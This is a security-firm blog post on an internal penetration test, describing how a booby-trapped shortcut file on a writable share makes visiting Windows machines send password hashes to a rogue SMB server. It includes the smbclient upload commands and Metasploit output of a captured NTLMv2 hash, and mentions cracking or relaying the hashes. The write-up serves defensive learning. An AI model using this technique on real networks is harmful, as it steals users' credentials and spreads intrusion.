CVE-2024-3400: PAN-OS Command Injection Vulnerability in GlobalProtect Gateway. Learn More

CVE-2024-3400: PAN-OS Command Injection Vulnerability in GlobalProtect Gateway. Learn More

Services
Capture
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

twi-managed-portal-color
Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

twi-briefcase-color-svg
Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

tw-laptop-data
Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

twi-database-color-svg
Database Security

Prevent unauthorized access and exceed compliance requirements.

twi-email-color-svg
Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

tw-officer
Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

tw-network
Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

You down with LNK?

Oftentimes on an Internal pen test, I find myself with a limited-privilege domain user account. On a recent test, I got ahold of an account like this through various means of hackery. It didn't have local admin anywhere, it wasn't a member of any IT groups; it was just a super low privilege user from the Marketing department. The only real privilege it had was write access to the Marketing share. In a quest to gather more user accounts, I decided to abuse my write access to the share and drop a backdoored shortcut file.

The idea here is that we can create a random shortcut file that goes nowhere, but pulls its icon image from a remote share. When a domain user visits the marketing share with the malicious LNK file in it, Windows tries to load up all the pretty icons for the files on the share. In our case, Windows tries to grab the icon for our malicious LNK file, sees that it's on another share, and attempts to auth to the remote share to get the icon file. That remote share just so happens to be our rogue SMB server (running static challenges for Rainbow Tables goodness, of course).

Lets get to work.
Fire up a Windows machine to create a random shortcut file, and then edit the settings to have it pull its icon image from a local network share. Then, use a hex editor to swap the IP and sharename to point to our SMB listener:

9982_75a59a43-439b-4310-8ee6-7192b4768e83

Now, lets drop this file on our Marketing share:

# smbclient -U BANANASTAND/user%pass //10.0.0.5/marketing/Domain=[BANANASTAND] OS=[EMC-PEEL] Server=[COLDSTORAGE1]smb: \> put trustwave.lnkputting file trustwave.lnk as \trustwave.lnk (58.0 kb/s) (average 58.0 kb/s)smb: \> dir  .                                   D        0  Wed Mar 28 14:07:44 2012  Thumbs.db                          HS    94208  Tue Mar  6 09:56:01 2012  Sales Folder                        D        0  Thu Mar  8 11:36:10 2012  SCANNED CONTRACTS.lnk                      210  Mon Feb 13 12:52:04 2012  Shortcut to Sales Folder.lnk               279  Fri Oct 21 09:15:08 2011  Client folder                       D        0  Tue Mar 20 15:49:35 2012  trustwave.lnk                        A      475  Wed Mar 28 14:07:44 2012  Sales Folder - Shortcut.lnk                635  Tue Mar  6 09:55:09 201256721 blocks of size 8388608. 12215 blocks available


Great! When anyone visits the marketing share, they will see this inconspicuous shortcut file:

10982_a2a84627-4a15-4e84-9c7a-63245c368f40

By the time they see it, their goose has already been cooked (er...hacked?). Their workstation has already gone hunting for the icon file located on our rogue SMB share:

msf  auxiliary(smb) >[*] SMB Captured - 2012-12-10 12:32:00 -0500NTLMv2 Response Captured from 10.0.0.104:49240 - 10.0.0.104USER:pc903423 DOMAIN:BANANASTAND OS: LM:LMHASH:Disabled LM_CLIENT_CHALLENGE:DisabledNTHASH:5630qw4fwer7013acf5665bre2d2weab8 NT_CLIENT_CHALLENGE:0101000000000000sdfh22353yk2356jl450239r7ebwe093ew00000000020000000000000000000000


That's it. By simply tricking a user into browsing a share, we can grab their password hash and start crackin' (or smb_relay them, if you are feeling lucky). What's nice about this attack is that it isn't limited to your local broadcast net like ARP Spoofing or any of the NBNS / LLMNR trickery. Its also pretty stealthy, there is no pop up boxes or error messages - Windows tries to auth to the SMB server, fails to get the icon file, and just moves on. This gives you the opportunity to quietly collect password hashes from several other users and propagate throughout the network nicely. Mmmmm, hashes.

Latest SpiderLabs Blogs

CVE-2024-3400: PAN-OS Command Injection Vulnerability in GlobalProtect Gateway

Overview A command injection vulnerability has been discovered in the GlobalProtect feature within Palo Alto Networks PAN-OS software for specific versions that have distinct feature configurations...

Read More

CNAPP, CSPM, CIEM, CWPP – Oh My!

We all know the cybersecurity industry loves its acronyms, but just because this fact is widely known doesn’t mean everyone knows the story behind the alphabet soup groups of letters, we must deal...

Read More

Phishing Deception - Suspended Domains Reveal Malicious Payload for Latin American Region

Recently, we observed a phishing campaign targeting the Latin American region. The phishing email contained a ZIP file attachment that when extracted reveals an HTML file that leads to a malicious...

Read More